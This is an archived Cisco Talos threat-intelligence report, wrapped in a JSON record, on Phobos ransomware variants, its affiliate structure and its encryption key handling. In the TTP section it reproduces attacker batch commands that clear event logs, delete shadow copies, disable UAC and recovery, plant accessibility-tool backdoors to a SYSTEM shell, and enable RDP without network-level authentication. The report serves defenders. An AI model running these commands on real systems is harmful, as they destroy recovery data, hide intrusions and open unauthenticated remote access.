{
	"id": "b1f630e8-1051-4941-a55d-387d451b8755",
	"created_at": "2026-04-06T01:31:12.68062Z",
	"updated_at": "2026-04-10T03:21:48.003746Z",
	"deleted_at": null,
	"sha1_hash": "b9df2ed4d5cdfa44df9f118b431749aac46e3c6b",
	"title": "Understanding the Phobos affiliate structure and activity",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 232894,
	"plain_text": "Understanding the Phobos affiliate structure and activity\r\nBy Guilherme Venere\r\nPublished: 2023-11-17 · Archived: 2026-04-06 00:51:47 UTC\r\nFriday, November 17, 2023 08:01\r\nCisco Talos recently identified the most prolific Phobos variants, common affiliate tactics, techniques and\r\nprocedures (TTPs), and characteristics of the Phobos affiliate structure, based on observed Phobos activity\r\nand analysis of over 1,000 Phobos samples from VirusTotal dating back to 2019.\r\nWe assess with moderate confidence Eking, Eight, Elbie, Devos and Faust are the most common Phobos\r\nvariants, as they appeared most frequently across the samples we analyzed. \r\nThe affiliates use similar TTPs to deploy Phobos and commonly target high-value servers, likely to\r\npressure victims into paying the ransom. \r\nWe assess with moderate confidence that the Phobos ransomware is closely managed by a central authority,\r\nas there is only one private key capable of decryption for all campaigns we observed.\r\nThere are also indications that Phobos may be sold as a ransomware-as-a-service (RaaS). We discovered\r\nhundreds of contact emails and IDs associated with Phobos campaigns, indicating the malware has a\r\ndispersed affiliate base, which is commonly seen among RaaS affiliates.\r\nIdentifying the most prolific Phobos variants\r\nPhobos ransomware is an evolution of the Dharma/Crysis ransomware and, since it was first observed in 2019, has\r\nundergone only minimal developments despite its popularity among cybercriminal groups. This is a continuation\r\nof our analysis on Phobos ransomware, previously addressed in a blog on the ransomware group 8Base.\r\nTalos identified five of the most prolific variants of the Phobos ransomware family, based on the volume of\r\nsamples in VirusTotal. 
https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 1 of 11\n\nWe examined several variations in the malware builder’s configuration settings, as this was\r\nthe only distinguishing feature among the samples analyzed. The samples all contained the same source code and\r\nwere configured to avoid encrypting files that other Phobos affiliates had already locked, but the configuration\r\nchanged slightly depending on the variant being deployed. \r\nFor example, a Phobos sample deployed by the 8Base ransomware group contained a list of other Phobos variants\r\nthat should not be encrypted, as seen below. A common trend for this configuration entry among all samples is that\r\nthe group behind that specific sample had their name added to the beginning of the list.\r\nList of file extensions to be ignored by the encryption loop with names of previous campaigns.\r\nOnce we extracted the samples’ configuration settings and identified the Phobos variant, Talos determined the\r\nmost active Phobos affiliates by matching the most commonly observed variants with the unique IDs associated\r\nwith each Phobos ransomware campaign. \r\nEking: Active since at least 2019, usually targets users in the Asia-Pacific region.\r\nEight: Believed to be an older campaign run by the same group running 8Base now.\r\nElbie: Also seen targeting users in the APAC region and active since 2022.\r\nDevos: Although this group has been active since 2019, not much has been written about it in terms of\r\nvictimology or TTPs.\r\nFaust: Another variant active since 2022 that does not target specific industries or regions.\r\nThe only differences between the samples of each variant are generally the contact email addresses used in the file\r\nextension for encrypted files, and the ransom note embedded in one of the settings, with all other settings being\r\nthe same. 
The file extension used in all Phobos variants we analyzed follows the same template as the example\r\nshown below, where \u003c\u003cID\u003e\u003e is replaced by the victim’s machine drive serial number. The next number is an\r\nidentifier for the current campaign, then an email used to contact the ransomware actors is listed, and finally, the\r\nextension representing the variant is appended.\r\n.id[\u003c\u003e-3253].[musonn@airmail[.]cc].eking\r\nWe defanged the email address for readers’ security, but the remaining square brackets are part of the actual\r\nextension used in all variants.\r\nThese variants have used hundreds of different contact emails over the past few years, as we can see in the graph\r\nbelow:\r\nCount of contact emails in use by each Phobos variant over the period of this research.\r\nThese emails are generally created using free or secure email providers, shown below:\r\nMost common email providers in use for Phobos ransomware.\r\nIn some cases, we have also seen affiliates using instant messaging services such as ICQ, Jabber and QQ to\r\nsupport their operations. 
The graph below illustrates the different providers chosen by the actors for each variant:\r\nDevos Eight Elbie Eking Faust\r\nemail[.]tg gmx[.]com tutanota[.]com tutanota[.]com gmx[.]com\r\ncock[.]li aol[.]com onionmail[.]org airmail[.]cc tutanota[.]com\r\nprotonmail[.]com protonmail[.]com tuta[.]io aol[.]com onionmail[.]org\r\nlibertymail[.]net tutanota[.]com techmail[.]info firemail[.]cc waifu[.]club\r\nqq[.]com onionmail[.]org cock[.]li tuta[.]io tuta[.]io\r\npressmail[.]ch cock[.]li privatemail[.]com protonmail[.]com gmail[.]com\r\nmedmail[.]ch keemail[.]me gmail[.]com cock[.]li airmail[.]cc\r\ntutanota[.]com mailfence[.]com yandex[.]ru criptext[.]com mailfence[.]com\r\ncumallover[.]me zohomail[.]eu msgsafe[.]io ctemplar[.]com xmpp[.]jp\r\nairmail[.]cc zohomail[.]com cyberfear[.]com gmx[.]com zohomail[.]eu\r\ncountermail[.]com ICQ@HONESTHORSE aol[.]com techmail[.]info cock[.]li\r\nmailfence[.]com ICQ@VIRTUALHORSE msgsafe[.]io zohomail[.]com\r\nmail[.]fr lenta[.]ru\r\nproton[.]me\r\nprivatemail[.]com\r\nWe observed Devos affiliates using QQ[.]com, a Chinese instant message application, and Eight affiliates using\r\nICQ, an instant message service currently owned by a Russian company. We also saw the use of service providers\r\nthat are considered to be more secure than others, like Proton Mail. This diversity of providers further supports our\r\nassessment that Phobos has a dispersed affiliate base and may be operating as a RaaS. 
\r\nBecause of the varied use of the email service providers listed above, and the sheer number of different contact\r\nemails in use for each variant, Talos assesses with moderate confidence that multiple threat actors are behind each\r\nof these variants instead of a single threat actor moving to different providers to avoid being banned.\r\nObserved tactics, techniques and procedures in Phobos intrusions\r\nIn early 2023, Talos observed an intrusion associated with the “Elbie” variant of Phobos. In this attack, the threat\r\nactor targeted the organization’s Exchange server and then moved laterally, attempting to compromise additional\r\nserver-side infrastructure including backup servers, database servers and hypervisor hosts. Rather than attempting\r\nto deploy the ransomware to a large number of systems concurrently, the attackers appeared to focus on specific\r\ninfrastructure and attempted to deploy the ransomware on each system individually. We believe this is because\r\nPhobos affiliates usually go after high-value servers in the victim’s network as a way to increase the damage and\r\nchance of a payout.\r\nAfter gaining initial access to the organization’s Exchange server, the attackers created a working directory in the\r\ncompromised user’s Desktop directory and attempted to drop various tools including, but not limited to:\r\nProcess Hacker: A process visualization tool that also contains a kernel-mode driver, which malicious\r\nactors sometimes use to delete files, stop services and kill processes.\r\nAutomim: This toolkit enables automated credential collection on compromised hosts and includes the\r\nLaZagne and Mimikatz utilities.\r\nIObit File Unlocker: A tool used to remove a lock on files held open by other applications, used by malicious\r\nactors to increase the chance of encrypting files like databases, open documents and similar files that are\r\nusually kept open.\r\nNirsoft Password Recovery Toolkit: A toolkit used to extract passwords for common 
applications like\r\nbrowsers and email clients.\r\nNetwork Scanner (NS.exe): An executable used to scan the network for open services and move laterally\r\nover the network.\r\nAngry IP Scanner: A tool used to scan the network for open services and identify network information for\r\nthe machines found.\r\nThe attacker also dropped a variety of batch files responsible for various post-compromise activities.\r\nOne batch file clears Windows event logs on compromised systems to minimize forensic artifacts and make\r\ndetection more difficult:\r\nFOR /F \"delims=\" %%I IN ('WEVTUTIL EL') DO (WEVTUTIL CL \"%%I\")\r\nAnother was responsible for deleting volume shadow copies, likely to make recovery following Phobos\r\ndeployment more difficult:\r\nvssadmin delete shadows /all /quiet\r\nwmic shadowcopy delete\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nbcdedit /set {default} recoveryenabled no\r\nwbadmin delete catalog -quiet\r\nexit\r\nThe script above is included in the Phobos configuration, as we noted in our previous blog; it is extracted and\r\nsaved as a temporary .BAT file before the encryption process starts.\r\nAdditionally, a batch file was created to configure the Windows Registry keys that enable the accessibility features\r\npresent on the Windows logon screen to spawn a SYSTEM-level command prompt without requiring previous\r\nauthentication. This may have been used as a persistence mechanism, allowing the attacker to regain full control\r\nof systems via RDP later in the attack. 
\r\nFirst, the script disables User Account Control (UAC) on the system by setting the following Registry entry:\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v EnableLUA /t REG_DWORD /d 0 /f\r\nNext, the script sets the Image File Execution Options debugger entry for various accessibility features to the\r\nWindows Command Processor. This allows an attacker to execute an elevated command shell on the system by\r\ninvoking the accessibility features from the Windows logon screen. Any time one of these applications is\r\nlaunched, the debugging application specified is launched with elevated permissions instead, which in this case, is\r\nthe Windows command processor. \r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"%windir%\\system32\\cmd.exe\"\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\" /f /v Debugger /t REG_SZ /d \"%windir%\\system32\\cmd.exe\"\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\" /f /v Debugger /t REG_SZ /d \"%windir%\\system32\\cmd.exe\"\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d \"%windir%\\system32\\cmd.exe\"\r\nFinally, the script configures various Registry entries responsible for enabling RDP and disabling network-level\r\nauthentication. 
\r\nREG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" /f /v fDenyTSConnections /t REG_DWORD /d \"00000000\"\r\nREG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" /f /v fAllowUnsolicited /t REG_DWORD /d \"00000001\"\r\nREG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" /f /v UserAuthentication /t REG_DWORD /d \"00000000\"\r\nREG ADD \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /f /v SecurityLayer /t REG_DWORD /d \"00000001\"\r\nAn additional script dropped by the threat actor was responsible for making the following service configuration\r\nchanges on compromised systems:\r\nsc config Dnscache start= auto\r\nnet start Dnscache\r\nsc config SSDPSRV start= auto\r\nnet start SSDPSRV\r\nsc config FDResPub start= auto\r\nnet start FDResPub\r\nsc config upnphost start= auto\r\nnet start upnphost\r\nFile-sharing was enabled on compromised hosts via the following command execution:\r\ndism /online /enable-feature /featurename:File-Services /NoRestart\r\nThe attacker also attempted to uninstall endpoint protection software on compromised hosts to minimize detection\r\nof various components used throughout the attack and prevent alerting security staff. \r\nOnce the defenses were disabled and the persistence mechanisms enabled, the threat actor deployed the Phobos\r\nransomware, encrypting the files in the server. In this case, the variant we observed during the infection was part\r\nof the “Elbie” campaign and displayed the same behavior we described in our previous blog. 
At the end of the\r\nprocess, the ransom note “info.hta” was dropped to the user’s Desktop with details on how to contact the attacker:\r\nExample of Phobos info.hta displaying the contact address.\r\nUnveiling the developers and affiliates behind Phobos\r\nThrough our analysis of Phobos campaigns and malware samples, we made several discoveries that helped shed\r\nlight on mysteries surrounding the ransomware’s little-known affiliate structure and developers.\r\nThere is some indication that Phobos may be a RaaS, due to the variation in email addresses we observed. Each\r\nPhobos variant from VirusTotal was associated with at least a dozen emails that were provided to victims to\r\nmaintain contact, and some had close to 200 unique email addresses with various domains. In some instances,\r\nICQ and Jabber were used as the main contact address. While it’s possible that there is a single group behind\r\nPhobos, it would be uncommon to have a threat actor change their contact email address so often. This would take\r\nextra time and effort while many ransomware campaigns very successfully use just a few contact addresses. For\r\nexample, when we observed the ransomware group 8base using Phobos as described in our other blog, they only\r\nused a single contact email, “support@rexsdata[.]pro”.\r\nWe also assess that Phobos is likely closely managed by a central authority that controls the ransomware’s private\r\ndecryptor key. For each file Phobos decides to encrypt, it generates a random AES key to use in the encryption,\r\nthen encrypts this key along with some metadata with an RSA key present in the configuration data, and saves this\r\ndata at the end of the encrypted file. 
That means in order to decrypt the file, one needs the private key\r\ncorresponding to that public RSA key.\r\nEvery Phobos sample we analyzed contains the same public RSA key in its configuration data, implying there is\r\nonly one private key capable of decryption. We assess that a single threat actor controls the private key as every\r\nsingle sample we analyzed contains the same public key. It’s possible the Phobos developer offers the decryption\r\nservice to their affiliates for a cut of their proceeds. \r\nDuring our research, we did find variants of these decryptors in the wild, like this sample found in VirusTotal\r\nwhich promises to decrypt files for the “Elbie” variant. However, the decryptor needs two pieces of\r\ninformation that are not available in the file itself, so using it to decrypt files is not possible. \r\nPhobos decryption tool screen asks for base64-encoded data.\r\nThe first piece needed seems to be a file with a base64-encoded encrypted blob of data which seems to be the RSA\r\nprivate key used to decrypt the files. The second piece of information needed is a password which is used to\r\ndecrypt the content of this blob. So, it may be possible for the RSA private key to be recovered if these two pieces\r\nof data are found, shared by a victim who paid for the decryption or leaked in the wild. \r\nFurther supporting our assessment that Phobos is run by a central authority is how meticulously the ransomware’s\r\nextension block lists are updated. As we stated previously, Phobos avoids encrypting files that were previously\r\nlocked by other Phobos affiliates. This is based on a file extension block list in the ransomware’s configuration\r\nsettings. 
The extension blocklists appear to tell a story of which groups used that same base sample over time.\r\nWhen a malware builder tool generates a binary for a campaign, it usually does so based on a fixed and clean\r\n“stub” binary, which is then populated with whatever payload or configuration is necessary for that current\r\nbuild. This is not what happens with Phobos.\r\nThe extension block lists found in the many Phobos samples Talos analyzed are continually updated with new files\r\nthat have been locked in previous Phobos campaigns. This may support the idea that there is a central authority\r\nbehind the builder who keeps track of who used Phobos in the past. The intent could be to prevent Phobos\r\naffiliates from interfering with one another's operations.\r\nCoverage\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and\r\nURLs, whether users are on or off the corporate network. 
Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nClamAV detections are available for this threat:\r\nWin.Packed.Zusy\r\nWin.Ransomware.8base\r\nWin.Downloader.Generic\r\nWin.Ransomware.Ulise\r\nIOCs\r\nIndicators of Compromise associated with this threat can be found here.\r\nSource: https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/"
	],
	"report_names": [
		"understanding-the-phobos-affiliate-structure"
	],
	"threat_actors": [],
	"ts_created_at": 1775439072,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b9df2ed4d5cdfa44df9f118b431749aac46e3c6b.pdf",
		"text": "https://archive.orkl.eu/b9df2ed4d5cdfa44df9f118b431749aac46e3c6b.txt",
		"img": "https://archive.orkl.eu/b9df2ed4d5cdfa44df9f118b431749aac46e3c6b.jpg"
	}
}